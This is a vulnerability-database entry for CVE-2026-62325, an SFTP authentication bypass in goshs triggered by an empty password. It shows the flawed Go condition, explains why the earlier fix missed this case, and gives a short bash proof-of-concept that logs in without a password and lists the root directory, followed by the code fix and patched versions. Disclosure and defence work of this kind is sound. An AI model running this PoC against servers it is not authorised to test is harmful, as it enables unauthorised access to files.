CVE-2026-62325Critical· 9.1▾ Midnightgoshs SFTP authentication bypass via empty password (incomplete fix of CVE-2026-40884)
▾ Midnight zone — Critical, or high with PoC / in-the-wild
impact 50.1 · likelihood 0.1 · exploitation 0
Need a working PoC? Pro members can cast a request and our team develops one — it lands right here.
Exploit-prediction probability, daily snapshots since Jul 29.
Disclosure to exploitation, from the record and what we observed since indexing it.
Disclosed via GHSA
0.3%
Start goshs v2.1.3 with -b 'admin:' -sftp. No -fkf. SFTP accepts connections without password. CVE-2026-40884 blocks the empty-username variant (-b ':pass'). The empty-password variant bypasses that fix.
CVE-2026-40884 (GHSA-c29w-qq4m-2gcv, Apr 13 2026) reported the empty-username case: -b ':pass' with -sftp. sftpserver.go:85 uses &&:
if s.Username != "" && s.Password != "" {
sshServer.PasswordHandler = func(ctx ssh.Context, password string) bool {
return subtle.ConstantTimeCompare([]byte(ctx.User()), []byte(s.Username)) == 1 && subtle.ConstantTimeCompare([]byte(password), []byte(s.Password)) == 1
}
}
Empty username → Username != "" false → PasswordHandler nil. No -fkf means PublicKeyHandler also nil. gliderlabs/ssh sees all handlers nil and sets NoClientAuth = true. Unauthenticated access.
Patrickhener fixed it with a sanity check at sanity/checks.go:114-118:
if opts.FTP && opts.FTPSFTPMode && strings.HasPrefix(opts.BasicAuth, ":") {
logger.Fatal("When using SFTP with password authentication, the username cannot be empty. ...")
}
HasPrefix(":") catches empty username. It does not catch empty password.
Same && at sftpserver.go:85. Same nil handler. Different input:
goshs -b 'admin:' -sftp
Username = "admin", Password = ""Username != "" && Password != "" → false. Password is empty.PasswordHandler not set. No -fkf → PublicKeyHandler not set.NoClientAuth = true.CVE-2026-40884 patched the symptom (empty username) with input validation. Root cause (&&) stayed in the code. v2.1.3 still has it. That makes any unanticipated input format exploitable.
#!/usr/bin/env bash
set -euo pipefail
HOST="${1:-127.0.0.1}"
PORT="${2:-2121}"
echo "[*] Connecting to goshs SFTP at $HOST:$PORT with empty password..."
echo "ls -la /" | sftp -o StrictHostKeyChecking=no \
-o UserKnownHostsFile=/dev/null \
-o PreferredAuthentications=none,password \
-o PubkeyAuthentication=no \
-P "$PORT" -b - admin@"$HOST" 2>&1 && \
echo "[+] VULNERABLE: Connected without password!" || \
echo "[-] Connection failed (patched or not running)"
// Wrong: &&
if s.Username != "" && s.Password != "" {
// Correct: ||
if s.Username != "" || s.Password != "" {
&& blocks PasswordHandler when either field is empty. || installs it when either field is set.
Patrickhener added HasPrefix(":") at sanity/checks.go:116. Two gaps remain:
&& still at sftpserver.go:85 in v2.1.3HasSuffix(":") check for empty password-b 'user:' and no -fkfAll goshs versions including v2.1.3. CVE-2026-40884 fix does not cover this variant.
&& → || at sftpserver/sftpserver.go:85HasSuffix(":") check at sanity/checks.gogithub.com/patrickhener/goshs/v2 = 2.1.3goshs.de/goshs/v2 = 2.1.3Upgrade to a patched release:
github.com/patrickhener/goshs/v2 2.1.4goshs.de/goshs/v2 2.1.4Connected by shared product, vendor, weakness, or advisory.
CVE-2026-66064Medium· 5.3goshs has ACL Bypass & Path Traversal
CVE-2019-1895Critical· 9.8A vulnerability in the Virtual Network Computing (VNC) console implementation of Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an unauthenticated, remote attacker to access the VNC console session of an administrative …
CVE-2026-2603High· 8.1A flaw was found in Keycloak
CVE-2019-5591Medium· 6.5A Default Configuration vulnerability in FortiOS may allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.
CVE-2024-0012Critical· 9.8An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with…
CVE-2024-51567Critical· 10.0upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which i…